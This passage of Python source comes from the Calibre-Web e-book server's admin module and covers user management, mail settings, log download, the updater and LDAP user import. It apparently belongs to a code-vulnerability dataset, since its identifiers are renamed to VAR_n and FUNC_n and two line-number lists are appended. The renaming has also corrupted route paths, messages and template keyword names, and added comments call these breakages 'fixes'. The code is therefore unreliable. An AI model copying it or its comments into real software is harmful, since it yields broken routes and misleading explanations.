        FUNC_50(_("Settings DB is not Writeable"))
    config.save()
    if VAR_83:
        web_server.stop(True)
    return FUNC_50(None, VAR_83)
def FUNC_50(VAR_19=None, VAR_20=False):
    """Build the JSON response returned after a configuration-save attempt.

    VAR_19 is an error message (None on success); VAR_20 signals that a
    server restart is required. On error the persisted configuration is
    reloaded so the in-memory state is not left half-updated.
    """
    if VAR_19:
        VAR_0.error(VAR_19)
        config.load()
        VAR_200 = [{'type': "danger", 'message': VAR_19}]
    else:
        VAR_200 = [{'type': "success", 'message': _(u"Calibre-Web FUNC_6 updated")}]
    VAR_201 = {
        'result': VAR_200,
        'reboot': VAR_20,
        'config_upload': config.config_upload_formats,
    }
    return Response(json.dumps(VAR_201), mimetype='application/json')
def FUNC_51(VAR_19=None, VAR_21=None):
    """Render the database / Google Drive configuration page.

    VAR_19: configuration error message (flashed and config reloaded if set).
    VAR_21: Google Drive error text; when absent it is fetched if gdrive use
    is enabled. Root folders are only listed when gdrive is ready.
    """
    VAR_87 = not is_gdrive_ready()
    VAR_88 = []
    if not VAR_21 and config.config_use_google_drive:
        VAR_21 = gdriveutils.get_error_text()
    if VAR_21 and gdrive_support:
        VAR_0.error(VAR_21)
        VAR_21 = _(VAR_21)
        flash(VAR_21, category="error")
    else:
        if not VAR_87 and gdrive_support:
            VAR_88 = gdriveutils.listRootFolders()
    if VAR_19:
        VAR_0.error(VAR_19)
        # reload persisted settings so the failed change is discarded
        config.load()
        flash(VAR_19, category="error")
    elif request.method == "POST" and not VAR_21:
        flash(_("Database Settings updated"), category="success")
    # fix: kwarg values referenced the undefined names 'gdrivefolders' and
    # 'feature_support' left over from a renaming pass (locals are VAR_88/VAR_1)
    return render_title_template("config_db.html",
                                 config=config,
                                 show_authenticate_google_drive=VAR_87,
                                 gdriveError=VAR_21,
                                 VAR_88=VAR_88,
                                 VAR_1=VAR_1,
                                 title=_(u"Database Configuration"), page="dbconfig")
def FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
    """Populate and persist a new user account from the form dict VAR_16.

    VAR_22 is the fresh ub.User instance to fill; VAR_23/VAR_24 are the
    language and translation lists needed to re-render the form; VAR_25 is
    the kobo-support flag. Validation failure re-renders the edit form;
    success stores the user and redirects to the admin page.
    """
    VAR_22.default_language = VAR_16["default_language"]
    VAR_22.locale = VAR_16.get("locale", VAR_22.locale)
    # Fold every checked "show_*" flag into the sidebar bitmask.
    VAR_22.sidebar_view = sum(VAR_119(key[5:]) for key in VAR_16 if key.startswith('show_'))
    if "show_detail_random" in VAR_16:
        VAR_22.sidebar_view |= constants.DETAIL_RANDOM
    VAR_22.role = constants.selected_roles(VAR_16)
    VAR_22.password = generate_password_hash(VAR_16["password"])
    try:
        if not VAR_16["name"] or not VAR_16["email"] or not VAR_16["password"]:
            VAR_0.info("Missing entries on new user")
            raise Exception(_(u"Please fill out all fields!"))
        VAR_22.email = check_email(VAR_16["email"])
        VAR_22.name = check_username(VAR_16["name"])
        if VAR_16.get("kindle_mail"):
            VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"])
        if config.config_public_reg and not check_valid_domain(VAR_22.email):
            VAR_0.info("E-mail: {} for new VAR_12 is not from valid domain".format(VAR_22.email))
            raise Exception(_(u"E-mail is not from valid domain"))
    except Exception as ex:
        flash(str(ex), category="error")
        # fix: kwarg values referenced the undefined names content/translations/
        # languages/kobo_support left over from a renaming pass
        return render_title_template("user_edit.html", FUNC_55=1, VAR_22=VAR_22,
                                     config=config,
                                     VAR_24=VAR_24,
                                     VAR_23=VAR_23, title=_(u"Add new user"), page="newuser",
                                     VAR_25=VAR_25, registered_oauth=VAR_97)
    try:
        # New accounts inherit the globally configured tag/column restrictions.
        VAR_22.allowed_tags = config.config_allowed_tags
        VAR_22.denied_tags = config.config_denied_tags
        VAR_22.allowed_column_value = config.config_allowed_column_value
        VAR_22.denied_column_value = config.config_denied_column_value
        VAR_22.kobo_only_shelves_sync = VAR_16.get("kobo_only_shelves_sync", 0) == "on"
        ub.session.add(VAR_22)
        ub.session.commit()
        flash(_(u"User '%(VAR_12)s' created", VAR_12=VAR_22.name), category="success")
        VAR_0.debug("User {} created".format(VAR_22.name))
        return redirect(url_for('admin.admin'))
    except IntegrityError:
        ub.session.rollback()
        VAR_0.error("Found an existing account for {} or {}".format(VAR_22.name, VAR_22.email))
        flash(_("Found an existing account for this e-mail address or name."), category="error")
    except OperationalError:
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
def FUNC_53(VAR_22):
    """Delete user VAR_22 together with every row that references it.

    Returns a translated success message. Raises Exception when VAR_22 is
    the built-in "Guest" account or the last remaining admin.
    """
    # Proceed only if at least one *other* admin account would remain.
    if ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                        ub.User.id != VAR_22.id).count():
        if VAR_22.name != "Guest":
            # Remove dependent rows first: read marks, download history, the
            # user's shelves and their book links, then the user row itself.
            ub.session.query(ub.ReadBook).filter(VAR_22.id == ub.ReadBook.user_id).delete()
            ub.session.query(ub.Downloads).filter(VAR_22.id == ub.Downloads.user_id).delete()
            for us in ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id):
                ub.session.query(ub.BookShelf).filter(us.id == ub.BookShelf.shelf).delete()
            ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id).delete()
            ub.session.query(ub.User).filter(ub.User.id == VAR_22.id).delete()
            ub.session_commit()
            VAR_0.info(u"User {} deleted".format(VAR_22.name))
            return(_(u"User '%(nick)s' deleted", nick=VAR_22.name))
        else:
            VAR_0.warning(_(u"Can't delete Guest User"))
            raise Exception(_(u"Can't delete Guest User"))
    else:
        VAR_0.warning(u"No FUNC_4 VAR_12 remaining, can't delete user")
        raise Exception(_(u"No FUNC_4 VAR_12 remaining, can't delete user"))
def FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
    """Apply the submitted edit-user form VAR_16 to existing user VAR_22.

    Handles deletion, role/sidebar changes, kobo sync, locale and identity
    updates. VAR_23/VAR_24 are the language/translation lists used to
    re-render the form on validation failure; VAR_25 is the kobo flag.
    Returns a redirect/render response on the special paths, "" otherwise.
    """
    if VAR_16.get("delete"):
        try:
            flash(FUNC_53(VAR_22), category="success")
        except Exception as ex:
            VAR_0.error(ex)
            flash(str(ex), category="error")
        return redirect(url_for('admin.admin'))
    else:
        # Refuse to strip the admin role when no other admin would remain.
        if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                                ub.User.id != VAR_22.id).count() and 'admin_role' not in VAR_16:
            VAR_0.warning("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role from {}".format(VAR_22.name))
            flash(_("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role"), category="error")
            return redirect(url_for('admin.admin'))
        if VAR_16.get("password"):
            VAR_22.password = generate_password_hash(VAR_16["password"])
        # Preserve the anonymous flag across the role recomputation.
        VAR_108 = VAR_22.is_anonymous
        VAR_22.role = constants.selected_roles(VAR_16)
        if VAR_108:
            VAR_22.role |= constants.ROLE_ANONYMOUS
        else:
            VAR_22.role &= ~constants.ROLE_ANONYMOUS
        # Sync sidebar bits with the submitted "show_*" checkboxes.
        VAR_109 = [VAR_119(k[5:]) for k in VAR_16 if k.startswith('show_')]
        VAR_110 = get_sidebar_config()
        for VAR_10 in VAR_110:
            VAR_125 = VAR_10['visibility']
            if VAR_125 in VAR_109 and not VAR_22.check_visibility(VAR_125):
                VAR_22.sidebar_view |= VAR_125
            elif VAR_125 not in VAR_109 and VAR_22.check_visibility(VAR_125):
                VAR_22.sidebar_view &= ~VAR_125
        if VAR_16.get("Show_detail_random"):
            VAR_22.sidebar_view |= constants.DETAIL_RANDOM
        else:
            VAR_22.sidebar_view &= ~constants.DETAIL_RANDOM
        VAR_111 = VAR_22.kobo_only_shelves_sync
        VAR_22.kobo_only_shelves_sync = VAR_119(VAR_16.get("kobo_only_shelves_sync") == "on") or 0
        # When shelf-only sync is newly enabled, refresh the sync state.
        if VAR_111 == 0 and VAR_22.kobo_only_shelves_sync == 1:
            kobo_sync_status.update_on_sync_shelfs(VAR_22.id)
        if VAR_16.get("default_language"):
            VAR_22.default_language = VAR_16["default_language"]
        if VAR_16.get("locale"):
            VAR_22.locale = VAR_16["locale"]
        try:
            if VAR_16.get("email", VAR_22.email) != VAR_22.email:
                VAR_22.email = check_email(VAR_16["email"])
            if VAR_16.get("name", VAR_22.name) != VAR_22.name:
                if VAR_16.get("name") == "Guest":
                    raise Exception(_("Guest Name can't be changed"))
                VAR_22.name = check_username(VAR_16["name"])
            if VAR_16.get("kindle_mail") != VAR_22.kindle_mail:
                VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"]) if VAR_16["kindle_mail"] else ""
        except Exception as ex:
            VAR_0.error(ex)
            flash(str(ex), category="error")
            # fix: kwarg values referenced the undefined names translations/
            # languages/kobo_support/content left over from a renaming pass
            return render_title_template("user_edit.html",
                                         VAR_24=VAR_24,
                                         VAR_23=VAR_23,
                                         mail_configured=config.get_mail_server_configured(),
                                         VAR_25=VAR_25,
                                         FUNC_55=0,
                                         VAR_22=VAR_22,
                                         config=config,
                                         registered_oauth=VAR_97,
                                         title=_(u"Edit User %(nick)s", nick=VAR_22.name),
                                         page="edituser")
    try:
        ub.session_commit()
        flash(_(u"User '%(nick)s' updated", nick=VAR_22.name), category="success")
    except IntegrityError as ex:
        ub.session.rollback()
        VAR_0.error("An unknown error occurred while changing VAR_12: {}".format(str(ex)))
        flash(_(u"An unknown error occurred. Please try again later."), category="error")
    except OperationalError:
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
    return ""
@VAR_2.route("/FUNC_4/VAR_12/new", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_55():
    """Render the "add new user" form; create the user on POST via FUNC_52."""
    VAR_22 = ub.User()
    VAR_23 = calibre_db.speaking_language()
    VAR_24 = [LC('en')] + babel.list_translations()
    VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
    if request.method == "POST":
        VAR_16 = request.form.to_dict()
        FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
    else:
        # Pre-fill the form with the configured defaults for new accounts.
        VAR_22.role = config.config_default_role
        VAR_22.sidebar_view = config.config_default_show
        VAR_22.locale = config.config_default_locale
        VAR_22.default_language = config.config_default_language
    # fix: kwarg values referenced the undefined names content/translations/
    # languages/kobo_support left over from a renaming pass
    return render_title_template("user_edit.html", FUNC_55=1, VAR_22=VAR_22,
                                 config=config, VAR_24=VAR_24,
                                 VAR_23=VAR_23, title=_(u"Add new user"), page="newuser",
                                 VAR_25=VAR_25, registered_oauth=VAR_97)
@VAR_2.route("/FUNC_4/mailsettings")
@login_required
@FUNC_0
def FUNC_56():
    """Render the e-mail server settings form."""
    VAR_22 = config.get_mail_settings()
    # fix: kwarg values referenced the undefined names 'content' and
    # 'feature_support' left over from a renaming pass (locals are VAR_22/VAR_1)
    return render_title_template("email_edit.html", VAR_22=VAR_22, title=_(u"Edit E-mail Server Settings"),
                                 page="mailset", VAR_1=VAR_1)
@VAR_2.route("/FUNC_4/mailsettings", methods=["POST"])
@login_required
@FUNC_0
def FUNC_57():
    """Store the submitted e-mail server settings, then re-render FUNC_56.

    Handles three form variants: invalidating the stored Gmail OAuth token,
    running the Gmail OAuth setup, or saving plain SMTP fields. When the
    "test" field is set and the current user has an e-mail address, a test
    mail is queued and the outcome flashed.
    """
    VAR_16 = request.form.to_dict()
    FUNC_38(VAR_16, "mail_server_type")
    if VAR_16.get("invalidate"):
        # Drop the stored Gmail OAuth token.
        config.mail_gmail_token = {}
        try:
            flag_modified(config, "mail_gmail_token")
        except AttributeError:
            # presumably config is not ORM-backed in this mode — TODO confirm
            pass
    elif VAR_16.get("gmail"):
        try:
            config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
            flash(_(u"Gmail Account Verification Successful"), category="success")
        except Exception as ex:
            flash(str(ex), category="error")
            VAR_0.error(ex)
            return FUNC_56()
    else:
        # Plain SMTP configuration fields.
        FUNC_41(VAR_16, "mail_server")
        FUNC_38(VAR_16, "mail_port")
        FUNC_38(VAR_16, "mail_use_ssl")
        FUNC_41(VAR_16, "mail_login")
        FUNC_41(VAR_16, "mail_password")
        FUNC_41(VAR_16, "mail_from")
        # submitted value is scaled by 1024*1024 (MiB -> bytes)
        FUNC_38(VAR_16, "mail_size", lambda y: VAR_119(y)*1024*1024)
    try:
        config.save()
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        VAR_0.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
        return FUNC_56()
    if VAR_16.get("test"):
        if VAR_62.email:
            VAR_126 = send_test_mail(VAR_62.email, VAR_62.name)
            if VAR_126 is None:
                flash(_(u"Test e-mail queued for sending to %(email)s, please VAR_66 Tasks for result",
                        email=VAR_62.email), category="info")
            else:
                flash(_(u"There was an error sending the Test e-mail: %(res)s", res=VAR_126), category="error")
        else:
            flash(_(u"Please configure your e-mail address first..."), category="error")
    else:
        flash(_(u"E-mail server settings updated"), category="success")
    return FUNC_56()
@VAR_2.route("/FUNC_4/VAR_12/<VAR_119:VAR_9>", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_58(VAR_9):
    """Show (GET) and process (POST) the edit form for the user with id VAR_9."""
    VAR_22 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()  # type: ub.User
    # Guest is only editable when anonymous browsing is enabled.
    if not VAR_22 or (not config.config_anonbrowse and VAR_22.name == "Guest"):
        flash(_(u"User not found"), category="error")
        return redirect(url_for('admin.admin'))
    VAR_23 = calibre_db.speaking_language(return_all_languages=True)
    VAR_24 = babel.list_translations() + [LC('en')]
    VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
    if request.method == "POST":
        VAR_16 = request.form.to_dict()
        VAR_86 = FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25)
        if VAR_86:
            return VAR_86
    # fix: kwarg values referenced the undefined names translations/languages/
    # content/kobo_support left over from a renaming pass
    return render_title_template("user_edit.html",
                                 VAR_24=VAR_24,
                                 VAR_23=VAR_23,
                                 FUNC_55=0,
                                 VAR_22=VAR_22,
                                 config=config,
                                 registered_oauth=VAR_97,
                                 mail_configured=config.get_mail_server_configured(),
                                 VAR_25=VAR_25,
                                 title=_(u"Edit User %(nick)s", nick=VAR_22.name),
                                 page="edituser")
@VAR_2.route("/FUNC_4/resetpassword/<VAR_119:VAR_9>", methods=["POST"])
@login_required
@FUNC_0
def FUNC_59(VAR_9):
    """Reset the password of user VAR_9, flash the outcome, return to admin page."""
    if VAR_62 is not None and VAR_62.is_authenticated:
        VAR_202, VAR_203 = reset_password(VAR_9)
        if VAR_202 == 1:
            VAR_0.debug(u"Password for VAR_12 %s reset", VAR_203)
            flash(_(u"Password for VAR_12 %(VAR_12)s reset", VAR_12=VAR_203), category="success")
        else:
            # 0 signals an unexpected failure; anything else means the SMTP
            # settings have not been configured yet.
            VAR_204 = (u"An unknown error occurred. Please try again later."
                       if VAR_202 == 0 else u"Please configure the SMTP mail settings first...")
            VAR_0.error(VAR_204)
            flash(_(VAR_204), category="error")
    return redirect(url_for('admin.admin'))
@VAR_2.route("/FUNC_4/logfile")
@login_required
@FUNC_0
def FUNC_60():
    """Render the log viewer with the app log (0) and access log (1) paths."""
    VAR_89 = {0: logger.get_logfile(config.config_logfile),
              1: logger.get_accesslogfile(config.config_access_logfile)}
    # fix: the VAR_89 kwarg value referenced the undefined name 'logfiles'
    # left over from a renaming pass
    return render_title_template("logviewer.html",
                                 title=_(u"Logfile viewer"),
                                 accesslog_enable=config.config_access_log,
                                 log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
                                 VAR_89=VAR_89,
                                 page="logfile")
@VAR_2.route("/ajax/VAR_0/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_61(VAR_26):
    """Serve the access log (VAR_26 == 1) or the application log (VAR_26 == 0)."""
    if VAR_26 == 1:
        VAR_205 = logger.get_accesslogfile(config.config_access_logfile)
    elif VAR_26 == 0:
        VAR_205 = logger.get_logfile(config.config_logfile)
    else:
        # any other id is not a known log file
        return ""
    return send_from_directory(os.path.dirname(VAR_205),
                               os.path.basename(VAR_205))
@VAR_2.route("/FUNC_4/logdownload/<VAR_119:VAR_26>")
@login_required
@FUNC_0
def FUNC_62(VAR_26):
    """Download the selected log file (0 = app log, 1 = access log); 404 otherwise."""
    if VAR_26 == 0:
        VAR_206 = logger.get_logfile(config.config_logfile)
    elif VAR_26 == 1:
        VAR_206 = logger.get_accesslogfile(config.config_access_logfile)
    else:
        abort(404)
    if not logger.is_valid_logfile(VAR_206):
        abort(404)
    return debug_info.assemble_logfiles(VAR_206)
@VAR_2.route("/FUNC_4/debug")
@login_required
@FUNC_0
def FUNC_63():
    """Send the collected debug-information bundle to the client."""
    return debug_info.send_debug()
@VAR_2.route("/get_update_status", methods=['GET'])
@login_required
@FUNC_0
def FUNC_64():
    """Return the available-updates response, or '' when the updater is disabled."""
    if not VAR_1['updater']:
        return ''
    VAR_0.info(u"Update VAR_90 requested")
    return updater_thread.get_available_updates(request.method, VAR_58=get_locale())
@VAR_2.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@FUNC_0
def FUNC_65():
    """Start an update run (POST with start=True) or report its progress (GET).

    Returns a JSON string with a numeric 'status' (and, on start, a 'text'
    map of status codes to translated messages); returns '' when the
    updater feature is disabled.
    """
    VAR_90 = {}
    if VAR_1['updater']:
        if request.method == "POST":
            VAR_98 = request.form.to_dict()
            if "start" in VAR_98 and VAR_98['start'] == 'True':
                # Progress / error texts keyed by the updater status code.
                VAR_130 = {
                    "1": _(u'Requesting update package'),
                    "2": _(u'Downloading update package'),
                    "3": _(u'Unzipping update package'),
                    "4": _(u'Replacing files'),
                    "5": _(u'Database connections are closed'),
                    "6": _(u'Stopping server'),
                    "7": _(u'Update finished, please press okay and reload page'),
                    "8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
                    "9": _(u'Update failed:') + u' ' + _(u'Connection error'),
                    "10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
                    "11": _(u'Update failed:') + u' ' + _(u'General error'),
                    "12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
                    "13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
                }
                VAR_90['text'] = VAR_130
                updater_thread.status = 0
                updater_thread.resume()
                VAR_90['status'] = updater_thread.get_update_status()
        elif request.method == "GET":
            try:
                VAR_90['status'] = updater_thread.get_update_status()
                if VAR_90['status'] == -1:
                    # -1 is reported to the client as 7 ("finished")
                    VAR_90['status'] = 7
            except Exception:
                VAR_90['status'] = 11
        return json.dumps(VAR_90)
    return ''
def FUNC_66(VAR_12, VAR_27):
    """Create a local user account from the LDAP record VAR_27 for user VAR_12.

    Returns (1, None) when a user was created, (0, None) when the record was
    skipped (already present or invalid e-mail), and (0, message) on failure.
    """
    # Name of the LDAP attribute that carries the username (e.g. "cn").
    VAR_91 = FUNC_69(VAR_12, config.config_ldap_user_object)
    try:
        VAR_114 = VAR_27[VAR_91][0].decode('utf-8')
    except KeyError as ex:
        VAR_0.error("Failed to extract LDAP VAR_12: %s - %s", VAR_12, ex)
        VAR_71 = _(u'Failed to extract at least One LDAP User')
        return 0, VAR_71
    # Skip records whose username already exists (case-insensitive match).
    if ub.session.query(ub.User).filter(VAR_18.lower(ub.User.name) == VAR_114.lower()).first():
        VAR_0.warning("LDAP User %s Already in Database", VAR_27)
        return 0, None
    VAR_92 = ''
    if 'mail' in VAR_27:
        VAR_115 = VAR_27['mail'][0].decode('utf-8')
        # A second mail entry, when present, becomes the kindle address.
        if len(VAR_27['mail']) > 1:
            VAR_92 = VAR_27['mail'][1].decode('utf-8')
    else:
        VAR_0.debug('No Mail Field Found in LDAP Response')
        # Fabricate a placeholder address when LDAP supplies none.
        VAR_115 = VAR_114 + '@email.com'
    try:
        VAR_115 = check_email(VAR_115)
    except Exception as ex:
        VAR_0.warning("LDAP Email Error: {}, {}".format(VAR_27, ex))
        return 0, None
    # Populate the new account with the globally configured defaults.
    VAR_22 = ub.User()
    VAR_22.name = VAR_114
    VAR_22.password = '' # dummy password which will be replaced by ldap one
    VAR_22.email = VAR_115
    VAR_22.kindle_mail = VAR_92
    VAR_22.default_language = config.config_default_language
    VAR_22.locale = config.config_default_locale
    VAR_22.role = config.config_default_role
    VAR_22.sidebar_view = config.config_default_show
    VAR_22.allowed_tags = config.config_allowed_tags
    VAR_22.denied_tags = config.config_denied_tags
    VAR_22.allowed_column_value = config.config_allowed_column_value
    VAR_22.denied_column_value = config.config_denied_column_value
    ub.session.add(VAR_22)
    try:
        ub.session.commit()
        return 1, None # increase no of VAR_54
    except Exception as ex:
        VAR_0.warning("Failed to create LDAP VAR_12: %s - %s", VAR_12, ex)
        ub.session.rollback()
        VAR_71 = _(u'Failed to Create at Least One LDAP User')
        return 0, VAR_71
@VAR_2.route('/import_ldap_users', methods=["POST"])
@login_required
@FUNC_0
def FUNC_67():
    """Import all members of the configured LDAP group as local users.

    Returns a JSON object whose 'text' entry reports the outcome: the number
    of users imported, or the first error encountered.
    """
    VAR_33 = {}
    try:
        VAR_116 = services.ldap.get_group_members(config.config_ldap_group_name)
    except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
        VAR_0.debug_or_exception(e)
        VAR_33['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
        return json.dumps(VAR_33)
    if not VAR_116:
        VAR_0.debug('LDAP empty response')
        VAR_33['text'] = _(u'Error: No VAR_12 returned in VAR_52 of LDAP server')
        return json.dumps(VAR_33)
    VAR_93 = 0
    for VAR_114 in VAR_116:
        VAR_12 = VAR_114.decode('utf-8')
        if '=' in VAR_12:
            # Member entry is a full DN: pull the username out with the
            # configured member (or fallback user) object template.
            if config.config_ldap_member_user_object:
                VAR_128 = config.config_ldap_member_user_object
            else:
                VAR_128 = config.config_ldap_user_object
            try:
                VAR_127 = FUNC_70(VAR_12, VAR_128)
            except Exception as ex:
                VAR_0.warning(ex)
                continue
        else:
            VAR_127 = VAR_12
            VAR_128 = None
        try:
            # fix: the filter kwarg value referenced the undefined name
            # 'query_filter' left over from a renaming pass (local is VAR_128)
            VAR_27 = services.ldap.get_object_details(VAR_12=VAR_127, VAR_128=VAR_128)
        except AttributeError as ex:
            VAR_0.debug_or_exception(ex)
            continue
        if VAR_27:
            VAR_129, VAR_71 = FUNC_66(VAR_12, VAR_27)
            if VAR_71:
                VAR_33['text'] = VAR_71
            else:
                VAR_93 += VAR_129
        else:
            VAR_0.warning("LDAP User: %s Not Found", VAR_12)
            VAR_33['text'] = _(u'At Least One LDAP User Not Found in Database')
    if not VAR_33:
        # fix: 'showtext' was an undefined leftover name; the dict is VAR_33
        VAR_33['text'] = _(u'{} User Successfully Imported'.format(VAR_93))
    return json.dumps(VAR_33)
def FUNC_68(VAR_12, VAR_28):
    """Extract the value of attribute VAR_28 (e.g. "cn") from the LDAP DN VAR_12.

    Raises Exception when the attribute is not present in the DN string.
    """
    VAR_207 = re.search(VAR_28 + r"=([\.\d\s\w-]+)", VAR_12, re.IGNORECASE | re.UNICODE)
    if VAR_207 is None:
        raise Exception("Could Not Parse LDAP User: {}".format(VAR_12))
    return VAR_207.group(1)
def FUNC_69(VAR_12, VAR_29):
    """Return the attribute name from an LDAP object template such as "cn=%s".

    VAR_12 is only used for the error message. Raises Exception when VAR_29
    contains no "<attribute>=%s" placeholder.
    """
    VAR_94 = re.search("([a-zA-Z0-9-]+)=%s", VAR_29, re.IGNORECASE | re.UNICODE)
    if VAR_94:
        return VAR_94.group(1)
    else:
        # fix: the message was previously passed as two Exception arguments
        # ("...{}", VAR_12), so the placeholder was never filled in
        raise Exception("Could Not Parse LDAP Userfield: {}".format(VAR_12))
def FUNC_70(VAR_12, VAR_29):
    """Extract the username value from LDAP DN VAR_12 using template VAR_29.

    First resolves the attribute name from the template (FUNC_69), then pulls
    that attribute's value out of the DN (FUNC_68).
    """
    return FUNC_68(VAR_12, FUNC_69(VAR_12, VAR_29))
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
41,
49,
54,
56,
64,
70,
79,
80,
83,
84,
89,
95,
97,
98,
101,
124,
125,
130,
131,
139,
142,
147,
150,
156,
159,
160,
171,
182,
189,
197,
198,
208,
209,
215,
216,
222,
223,
229,
245,
279,
280,
293,
298,
302,
304,
315,
321,
327,
351,
360,
371,
372,
383,
384,
393,
431,
453,
488,
489,
505,
512,
519,
520,
526,
531,
537,
543,
550,
551,
554,
558,
563,
565,
566,
596,
597,
602,
603,
604,
605,
610,
611,
624,
625,
634,
642,
643,
654,
655,
721,
722,
730,
731,
737,
738,
757,
758,
764,
809,
810,
816,
817,
857,
863,
864,
908,
916,
917,
923,
924,
930,
936,
938,
940,
943,
944,
947,
956,
959,
964,
972,
980,
990,
992,
994,
1004,
1005,
1008,
1009,
1012,
1013,
1016,
1017,
1020,
1021,
1026,
1029,
1042,
1043,
1051,
1052,
1073,
1074,
1082,
1089,
1090,
1112,
1119,
1127,
1134,
1140,
1149,
1158,
1159,
1166,
1167,
1178,
1179,
1184,
1191,
1192,
1205,
1210,
1226,
1236,
1240,
1243,
1251,
1257,
1261,
1263,
1264,
1270,
1271,
1275,
1276,
1284,
1286,
1287,
1290,
1291,
1294,
1299,
1309,
1313,
1315,
1327,
1328,
1347,
1355,
1356,
1360,
1364,
1372,
1391,
1406,
1411,
1412,
1428,
1429,
1452,
1461,
1466,
1469,
1470,
1471,
1481,
1514,
1515,
1536,
1537,
1545,
1546,
1567,
1583,
1596,
1598,
1599,
1627,
1628,
1645,
1646,
1659,
1660,
1675,
1676,
1690,
1691,
1697,
1698,
1708,
1709,
1747,
1748,
1751,
1758,
1759,
1761,
1764,
1770,
1774,
1776,
1803,
1804,
1820,
1825,
1855,
1856,
1863,
1864,
1871,
1872,
1876,
86,
87,
88
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
30,
41,
49,
54,
56,
64,
70,
79,
80,
83,
84,
89,
95,
97,
98,
101,
124,
125,
130,
131,
139,
142,
147,
150,
156,
159,
160,
171,
182,
189,
197,
198,
208,
209,
215,
216,
222,
223,
229,
245,
279,
280,
293,
298,
302,
304,
315,
321,
327,
351,
360,
371,
372,
383,
384,
393,
431,
453,
488,
489,
505,
512,
519,
520,
526,
531,
537,
543,
550,
551,
554,
558,
563,
565,
566,
596,
597,
602,
603,
604,
605,
610,
611,
624,
625,
634,
642,
643,
654,
655,
721,
722,
730,
731,
737,
738,
757,
758,
764,
809,
810,
816,
817,
857,
863,
864,
908,
916,
917,
923,
924,
930,
936,
938,
940,
943,
944,
947,
956,
959,
964,
972,
980,
990,
992,
994,
1004,
1005,
1008,
1009,
1012,
1013,
1016,
1017,
1020,
1021,
1026,
1029,
1042,
1043,
1051,
1052,
1073,
1074,
1082,
1089,
1090,
1112,
1119,
1127,
1134,
1140,
1149,
1158,
1159,
1166,
1167,
1178,
1179,
1184,
1191,
1192,
1205,
1210,
1226,
1236,
1240,
1243,
1251,
1257,
1261,
1263,
1264,
1270,
1271,
1275,
1276,
1284,
1286,
1287,
1290,
1291,
1294,
1299,
1309,
1313,
1315,
1327,
1328,
1347,
1355,
1356,
1360,
1364,
1372,
1391,
1406,
1411,
1412,
1428,
1429,
1452,
1461,
1466,
1469,
1470,
1471,
1481,
1514,
1515,
1536,
1537,
1545,
1546,
1567,
1583,
1596,
1598,
1599,
1627,
1628,
1645,
1646,
1659,
1660,
1675,
1676,
1690,
1691,
1697,
1698,
1708,
1709,
1747,
1748,
1751,
1758,
1759,
1761,
1764,
1770,
1774,
1776,
1803,
1804,
1820,
1825,
1855,
1856,
1863,
1864,
1871,
1872,
1876,
86,
87,
88
] |